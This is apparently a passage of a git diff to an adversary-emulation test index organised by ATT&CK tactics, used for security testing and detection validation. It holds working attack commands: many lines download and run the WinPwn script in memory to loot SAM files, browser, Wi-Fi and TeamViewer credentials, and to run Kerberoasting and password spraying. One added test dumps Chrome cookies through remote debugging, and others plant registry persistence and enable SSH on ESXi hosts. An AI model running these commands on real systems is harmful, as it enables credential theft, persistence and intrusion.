           safedump -consoleoutput -noninteractive
         name: powershell
@@ -43894,7 +44182,7 @@ execution:
 
             '
           type: url
-          default: 
+          default:
         c2_parent_directory:
           description: |
             Parent directory where you have the "malicious" file on c2_domain server.
@@ -44462,7 +44750,7 @@ execution:
   T1059.010:
     technique:
       modified: '2024-04-28T15:58:48.119Z'
-      name: AutoHotKey & AutoIT
+      name: 'Command and Scripting Interpreter: AutoHotKey & AutoIT'
       description: |-
         Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
 
@@ -44514,7 +44802,49 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1059.010
+    atomic_tests:
+    - name: AutoHotKey script execution
+      auto_generated_guid: 7b5d350e-f758-43cc-a761-8e3f6b052a03
+      description: 'An adversary may attempt to execute malicious script using AutoHotKey
+        software instead of regular terminal like powershell or cmd. A messagebox
+        will be displayed and calculator will popup when the script is executed successfully
+
+        '
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'AutoHotKey executable file must exist on disk at the specified
+          location (#{autohotkey_path})
+
+          '
+        prereq_command: |
+          if(Test-Path "#{autohotkey_path}") {
+              exit 0
+          } else {
+              exit 1
+          }
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          $AutoHotKeyURL = "https://www.autohotkey.com/download/ahk.zip"
+          $InstallerPath = "$PathToAtomicsFolder\..\ExternalPayloads"
+          Invoke-WebRequest -Uri $AutoHotKeyURL -OutFile $InstallerPath\ahk.zip
+          Expand-Archive -Path $InstallerPath -Force;
+      input_arguments:
+        script_path:
+          description: AutoHotKey Script Path
+          type: path
+          default: PathToAtomicsFolder\T1059.010\src\calc.ahk
+        autohotkey_path:
+          description: AutoHotKey Executable File Path
+          type: path
+          default: "$PathToAtomicsFolder\\..\\ExternalPayloads\\ahk\\AutoHotKeyU64.exe"
+      executor:
+        command: 'Start-Process -FilePath "#{autohotkey_path}" -ArgumentList "#{script_path}"
+
+          '
+        name: powershell
   T1059.009:
     technique:
       modified: '2024-10-15T15:44:20.143Z'
@@ -46889,6 +47219,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1651
     atomic_tests: []
   T1059.005:
     technique:
@@ -47167,6 +47498,7 @@ execution:
         url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      identifier: T1648
     atomic_tests: []
   T1204.001:
     technique:
@@ -51601,7 +51933,7 @@ persistence:
           $chromium =  "https://commondatastorage.googleapis.com/chromium-browser-snapshots/Win_x64/1153778/chrome-win.zip"
 
           # uBlock Origin Lite to test side-loading
-          $extension = "https://github.com/gorhill/uBlock/releases/download/uBOLite_0.1.23.6055/uBOLite_0.1.23.6055.chromium.mv3.zip"
+          $extension = "https://github.com/uBlockOrigin/uBOL-home/releases/download/uBOLite_2024.11.25.1376/uBOLite_2024.11.25.1376.chromium.mv3.zip"
 
           Set-Location "#{working_dir}"
 
@@ -56316,11 +56648,11 @@ persistence:
           default: calc
       executor:
         command: 'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd"
-          /v StartupPrograms /t REG_SZ /d "#{malicious_app}"
+          /f /v StartupPrograms /t REG_SZ /d "#{malicious_app}"
 
           '
         cleanup_command: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd"
-          /v StartupPrograms /t REG_SZ /d "rdpclip"
+          /f /v StartupPrograms /t REG_SZ /d "rdpclip"
         name: command_prompt
         elevation_required: true
     - name: Creating Boot Verification Program Key for application execution during
@@ -56342,6 +56674,21 @@ persistence:
 
           '
         cleanup_command: reg delete HKLM\System\CurrentControlSet\Control\BootVerificationProgram
+          /f
+        name: command_prompt
+        elevation_required: true
+    - name: Add persistence via Windows Context Menu
+      auto_generated_guid: de47f4a0-2acb-416d-9a6b-cee584a4c4d1
+      description: |
+        This atomic test add persistence taking advantage of the  Windows Context Menu [Hexacorn](https://www.hexacorn.com/blog/2018/07/29/beyond-good-ol-run-key-part-82/)
+        User have to right click on the main screen or in the white space of the opened folder (e.g. Size Modify).
+      supported_platforms:
+      - windows
+      executor:
+        command: reg add "HKEY_CLASSES_ROOT\Directory\Background\shell\Size Modify\command"
+          /ve /t REG_SZ /d "C:\Windows\System32\calc.exe" /f
+        cleanup_command: reg delete "HKEY_CLASSES_ROOT\Directory\Background\shell\Size
+          Modify" /f
         name: command_prompt
         elevation_required: true
   T1136.003:
@@ -61783,7 +62130,6 @@ persistence:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           obfuskittiedump -consoleoutput -noninteractive
         name: powershell
@@ -61795,7 +62141,6 @@ persistence:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           safedump -consoleoutput -noninteractive
         name: powershell
@@ -63109,7 +63454,7 @@ command-and-control:
         MSP360_Download_Url:
           description: URL to download MSP360 Connect from
           type: url
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'MSP360 must exist at (#{MSP360_Connect_Path})
@@ -63213,6 +63558,17 @@ command-and-control:
           Remote\Server\#{srserver_exe}"
         name: powershell
         elevation_required: true
+    - name: Microsoft App Quick Assist Execution
+      auto_generated_guid: 1aea6d15-70f1-4b4e-8b02-397b5d5ffe75
+      description: "An adversary may attempt to trick a user into executing Microsoft
+        Quick Assist Microsoft Store app and connect to the user's machine. \n"
+      supported_platforms:
+      - windows
+      executor:
+        command: Start-Process "shell:AppsFolder\MicrosoftCorporationII.QuickAssist_8wekyb3d8bbwe!App"
+        cleanup_command: Stop-Process -Name quickassist
+        name: powershell
+        elevation_required: true
   T1659:
     technique:
       modified: '2023-10-01T02:28:45.147Z'
@@ -66481,9 +66837,12 @@ command-and-control:
           {exit 0}
           }
         get_prereq_command: "Write-Output \"Generating random passwords and saving
-          to file...\"\n$passwords = 1..10 | ForEach-Object { Get-Random -InputObject
-          ('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+[]{}|;:,.<>?')
-          -Count 12 }\n$passwords | Out-File -FilePath \"#{passwords_file}\"    \n"
+          to file...\"\n$passwords = 1..10 | ForEach-Object { -join ((1..12) | ForEach-Object
+          { @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z')
+          + @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z')
+          + @('0','1','2','3','4','5','6','7','8','9') + @('!','@','#','$','%','^','&','*','(','(',')','-','=','+','_','[',']','{','}','|',';',';',':',',','<','>','?')
+          | Get-Random }) }\n$passwords | Out-File -FilePath \"#{passwords_file}\"
+          \   \n"
       - description: "Tarz file to embed in image must exist \n"
         prereq_command: |
           if (!(Test-Path "#{tar_file}")) {exit 1} else {
@@ -67268,7 +67627,7 @@ collection:
       - windows
       executor:
         command: |
-          reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI" /v DisableAIDataAnalysis /t REG_DWORD /d 1 /f
+          reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI" /v DisableAIDataAnalysis /t REG_DWORD /d 0 /f
           reg delete "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI" /v DisableAIDataAnalysis /f
         cleanup_command: 'reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI"
           /v DisableAIDataAnalysis /t REG_DWORD /d 1 /f
@@ -70568,7 +70927,96 @@ lateral-movement:
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1021.004
-    atomic_tests: []
+    atomic_tests:
+    - name: ESXi - Enable SSH via PowerCLI
+      auto_generated_guid: 8f6c14d1-f13d-4616-b7fc-98cc69fe56ec
+      description: 'An adversary enables the SSH service on a ESXi host to maintain
+        persistent access to the host and to carryout subsequent operations.
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        vm_user:
+          description: Specify the privilege user account on ESXi Server
+          type: string
+          default: root
+        vm_pass:
+          description: Specify the privilege user password on ESXi Server
+          type: string
+          default: pass
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Check if VMWARE PowerCLI PowerShell Module is installed.
+
+          '
+        prereq_command: |
+          $RequiredModule = Get-Module -Name VMware.PowerCLI -ListAvailable
+          if (-not $RequiredModule) {exit 1}
+        get_prereq_command: 'Install-Module -Name VMware.PowerCLI
+
+          '
+      executor:
+        command: "Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false
+          -Confirm:$false \nConnect-VIServer -Server #{vm_host} -User #{vm_user} -Password
+          #{vm_pass}\nGet-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key
+          -eq \"TSM-SSH\" } | Start-VMHostService -Confirm:$false\n"
+        cleanup_command: "Set-PowerCLIConfiguration -InvalidCertificateAction Ignore
+          -ParticipateInCEIP:$false -Confirm:$false \nConnect-VIServer -Server #{vm_host}
+          -User #{vm_user} -Password #{vm_pass}\nGet-VMHostService -VMHost #{vm_host}
+          | Where-Object {$_.Key -eq \"TSM-SSH\" } | Stop-VMHostService -Confirm:$false\n"
+        name: powershell
+        elevation_required: true
+    - name: ESXi - Enable SSH via VIM-CMD
+      auto_generated_guid: 280812c8-4dae-43e9-a74e-1d08ab997c0e
+      description: |
+        An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface.
+        [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_host:
+          description: Specify the host name or IP of the ESXi server.
+          type: string
+          default: atomic.local
+        vm_user:
+          description: Specify the privilege user account on the ESXi server.
+          type: string
+          default: root
+        vm_pass:
+          description: Specify the privileged user's password.
+          type: string
+          default: password
+        plink_file:
+          description: Path to Plink
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Check if we have plink
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
+          -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
+
+          '
+        cleanup_command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
+          -pw "#{vm_pass}" "vim-cmd hostsvc/disable_ssh"
+
+          '
+        name: command_prompt
+        elevation_required: false
   T1091:
     technique:
       modified: '2023-10-17T20:42:21.453Z'
@@ -71615,7 +72063,7 @@ lateral-movement:
           description: Ticket file name usually format of 'id-username\@domain.kirbi'
             (e.g. can be dumped by "sekurlsa::tickets /export" module)
           type: string
-          default: 
+          default:
         mimikatz_exe:
           description: Path of the Mimikatz binary
           type: path
@@ -73835,6 +74283,50 @@ credential-access:
           '
         name: powershell
         elevation_required: false
+    - name: Steal Chrome v127+ cookies via Remote Debugging (Windows)
+      auto_generated_guid: b647f4ee-88de-40ac-9419-f17fac9489a7
+      description: |-
+        Chrome v127+ uses app-bound encryption to protect cookies. This test bypasses that protection to obtain the cookies. If successful, the test outputs cookie values to the console.
+        Note: Will stop any instances of Chrome already running
+        Adapted from https://embracethered.com/blog/posts/2024/cookie-theft-in-2024-and-what-todo
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $devToolsPort = 9222
+          $testUrl = "https://www.google.com"
+          stop-process -name "chrome" -force -erroraction silentlycontinue
+          $chromeProcess = Start-Process "chrome.exe" "$testUrl --remote-debugging-port=$devToolsPort --profile-directory=Default" -PassThru
+          Start-Sleep 10
+          $jsonResponse = Invoke-WebRequest "http://localhost:$devToolsPort/json" -UseBasicParsing
+          $devToolsPages = ConvertFrom-Json $jsonResponse.Content
+          $ws_url = $devToolsPages[0].webSocketDebuggerUrl
+          $ws = New-Object System.Net.WebSockets.ClientWebSocket
+          $uri = New-Object System.Uri($ws_url)
+          $ws.ConnectAsync($uri, [System.Threading.CancellationToken]::None).Wait()
+          $GET_ALL_COOKIES_REQUEST = '{"id": 1, "method": "Network.getAllCookies"}'
+          $buffer = [System.Text.Encoding]::UTF8.GetBytes($GET_ALL_COOKIES_REQUEST)
+          $segment = New-Object System.ArraySegment[byte] -ArgumentList $buffer, 0, $buffer.Length
+          $ws.SendAsync($segment, [System.Net.WebSockets.WebSocketMessageType]::Text, $true, [System.Threading.CancellationToken]::None).Wait()
+          $completeMessage = New-Object System.Text.StringBuilder
+          do {
+              $receivedBuffer = New-Object byte[] 2048
+              $receivedSegment = New-Object System.ArraySegment[byte] -ArgumentList $receivedBuffer, 0, $receivedBuffer.Length
+              $result = $ws.ReceiveAsync($receivedSegment, [System.Threading.CancellationToken]::None).Result
+              $receivedString = [System.Text.Encoding]::UTF8.GetString($receivedSegment.Array, $receivedSegment.Offset, $result.Count)
+              $completeMessage.Append($receivedString)
+          } while (-not $result.EndOfMessage)
+          $ws.CloseAsync([System.Net.WebSockets.WebSocketCloseStatus]::NormalClosure, "Closing", [System.Threading.CancellationToken]::None).Wait()
+          try {
+              $response = ConvertFrom-Json $completeMessage.ToString()
+              $cookies = $response.result.cookies
+          } catch {
+              Write-Host "Error parsing JSON data."
+          }
+          Write-Host $cookies
+          Stop-Process $chromeProcess -Force
+        name: powershell
+        elevation_required: false
   T1003.002:
     technique:
       modified: '2024-10-15T16:40:52.174Z'
@@ -74075,8 +74567,7 @@ credential-access:
       supported_platforms:
       - windows
       executor:
-        command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object
-          net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsamfile
+        command: "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsamfile
           -consoleoutput -noninteractive  "
         name: powershell
     - name: Dumping of SAM, creds, and secrets(Reg Export)
@@ -75681,7 +76172,6 @@ credential-access:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           lazagnemodule -consoleoutput -noninteractive
         name: powershell
@@ -75692,8 +76182,7 @@ credential-access:
       supported_platforms:
       - windows
       executor:
-        command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object
-          net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nwificreds
+        command: "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nwificreds
           -consoleoutput -noninteractive  "
         name: powershell
     - name: WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords
@@ -75703,8 +76192,7 @@ credential-access:
       supported_platforms:
       - windows
       executor:
-        command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object
-          net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ndecryptteamviewer
+        command: "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ndecryptteamviewer
           -consoleoutput -noninteractive  "
         name: powershell
   T1552:
@@ -76094,9 +76582,10 @@ credential-access:
           Expand-Archive "#{file_path}\Modified-SysInternalsSuite.zip" "#{file_path}\sysinternals" -Force
           Remove-Item "#{file_path}\Modified-SysInternalsSuite.zip" -Force
       executor:
-        command: |
-          Set-Location -path "#{file_path}\Sysinternals";
-          ./accesschk.exe -accepteula .;
+        command: 'Start-Process "#{file_path}\Sysinternals\accesschk.exe" -ArgumentList
+          "-accepteula ."
+
+          '
         cleanup_command: 'Remove-Item "#{file_path}\Sysinternals" -Force -Recurse
           -ErrorAction Ignore
 
@@ -76437,7 +76926,6 @@ credential-access:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           browserpwn -consoleoutput -noninteractive
         cleanup_command: rm .\System.Data.SQLite.dll -ErrorAction Ignore
@@ -76450,7 +76938,6 @@ credential-access:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           kittenz -consoleoutput -noninteractive
         name: powershell
@@ -77910,7 +78397,6 @@ credential-access:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           domainpassspray -consoleoutput -noninteractive -emptypasswords
         name: powershell
@@ -78660,7 +79146,6 @@ credential-access:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           sensitivefiles -noninteractive -consoleoutput
         name: powershell
@@ -78672,7 +79157,6 @@ credential-access:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           Snaffler -noninteractive -consoleoutput
         name: powershell
@@ -78684,7 +79168,6 @@ credential-access:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           powershellsensitive -consoleoutput -noninteractive
         name: powershell
@@ -78695,7 +79178,6 @@ credential-access:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           passhunt -local $true -noninteractive
         cleanup_command: |-
@@ -78714,7 +79196,6 @@ credential-access:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           sessionGopher -noninteractive -consoleoutput
         name: powershell
@@ -78726,8 +79207,7 @@ credential-access:
       supported_platforms:
       - windows
       executor:
-        command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object
-          net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nSharpCloud
+        command: "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nSharpCloud
           -consoleoutput -noninteractive  "
         name: powershell
     - name: List Credential Files via PowerShell
@@ -81273,7 +81753,7 @@ credential-access:
           description: command flags you would like to run (optional and blank by
             default)
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'Computer must be domain joined
@@ -81401,7 +81881,6 @@ credential-access:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           Kerberoasting -consoleoutput -noninteractive
         name: powershell
@@ -82540,7 +83019,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           GPOAudit -noninteractive -consoleoutput
         name: powershell
@@ -82552,7 +83030,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           GPORemoteAccessPolicy -consoleoutput -noninteractive
         name: powershell
@@ -82673,7 +83150,7 @@ discovery:
         command: |
           driverquery /v /fo list
           driverquery /si /fo list
-        cleanup_command: 
+        cleanup_command:
         name: powershell
         elevation_required: false
   T1087.002:
@@ -82824,7 +83301,7 @@ discovery:
             it to the specific needs of the environment. Use "-arg" notation to add
             arguments separated by spaces.
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -82857,7 +83334,7 @@ discovery:
             it to the specific needs of the environment. Use "-arg" notation to add
             arguments separated by spaces.
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -82889,7 +83366,7 @@ discovery:
             it to the specific needs of the environment. Use "-arg" notation to add
             arguments separated by spaces.
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -82921,7 +83398,7 @@ discovery:
             it to the specific needs of the environment. Use "-arg" notation to add
             arguments separated by spaces.
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -83069,7 +83546,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           generaldomaininfo -noninteractive -consoleoutput
         name: powershell
@@ -83146,7 +83622,7 @@ discovery:
           default: "$env:computername"
       executor:
         command: 'Get-ADComputer #{hostname} -Properties *'
-        cleanup_command: 
+        cleanup_command:
         name: powershell
         elevation_required: false
     - name: Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property
@@ -83162,7 +83638,7 @@ discovery:
           default: "$env:computername"
       executor:
         command: 'Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime'
-        cleanup_command: 
+        cleanup_command:
         name: powershell
         elevation_required: false
     - name: Suspicious LAPS Attributes Query with Get-ADComputer all properties and
@@ -83176,7 +83652,7 @@ discovery:
       executor:
         command: Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties
           *
-        cleanup_command: 
+        cleanup_command:
         name: powershell
         elevation_required: false
     - name: Suspicious LAPS Attributes Query with adfind all properties
@@ -83191,7 +83667,7 @@ discovery:
             it to the specific needs of the environment. Use "-arg" notation to add
             arguments separated by spaces.
           type: string
-          default: 
+          default:
         domain:
           description: Domain of the host
           type: string
@@ -83201,7 +83677,7 @@ discovery:
           -h #{domain} -s subtree -f "objectclass=computer" *
 
           '
-        cleanup_command: 
+        cleanup_command:
         name: powershell
         elevation_required: false
     - name: Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd
@@ -83216,7 +83692,7 @@ discovery:
             it to the specific needs of the environment. Use "-arg" notation to add
             arguments separated by spaces.
           type: string
-          default: 
+          default:
         domain:
           description: Domain of the host
           type: string
@@ -83226,7 +83702,7 @@ discovery:
           -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
 
           '
-        cleanup_command: 
+        cleanup_command:
         name: powershell
         elevation_required: false
   T1087.001:
@@ -83343,6 +83819,48 @@ discovery:
 
           '
         name: command_prompt
+    - name: ESXi - Local Account Discovery via ESXCLI
+      auto_generated_guid: 9762ac6e-aa60-4449-a2f0-cbbd0e1fd22c
+      description: |
+        An adversary can use ESXCLI to enumerate a list of all local accounts on an ESXi host.
+        [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/esxcli/#account%20enumeration)"
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_host:
+          description: Specify the host name or IP of the ESXi server.
+          type: string
+          default: atomic.local
+        vm_user:
+          description: Specify the privilege user account on the ESXi server.
+          type: string
+          default: root
+        vm_pass:
+          description: Specify the privileged user's password.
+          type: string
+          default: password
+        plink_file:
+          description: Path to Plink
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Check if we have plink
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
+          -pw "#{vm_pass}" "esxcli system account list"
+
+          '
+        name: command_prompt
+        elevation_required: false
   T1497.001:
     technique:
       modified: '2024-09-12T15:50:18.047Z'
@@ -83667,7 +84185,7 @@ discovery:
             it to the specific needs of the environment. Use "-arg" notation to add
             arguments separated by spaces.
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -84181,7 +84699,7 @@ discovery:
       auto_generated_guid: 20f1097d-81c1-405c-8380-32174d493bbb
       description: |
         Network Share Discovery utilizing the command prompt. The computer name variable may need to be modified to point to a different host
-        Upon execution avalaible network shares will be displayed in the powershell session
+        Upon execution available network shares will be displayed in the powershell session
       supported_platforms:
       - windows
       input_arguments:
@@ -84198,7 +84716,7 @@ discovery:
       auto_generated_guid: 1b0814d1-bb24-402d-9615-1b20c50733fb
       description: |
         Network Share Discovery utilizing PowerShell. The computer name variable may need to be modified to point to a different host
-        Upon execution, avalaible network shares will be displayed in the powershell session
+        Upon execution, available network shares will be displayed in the powershell session
       supported_platforms:
       - windows
       executor:
@@ -84209,7 +84727,7 @@ discovery:
     - name: View available share drives
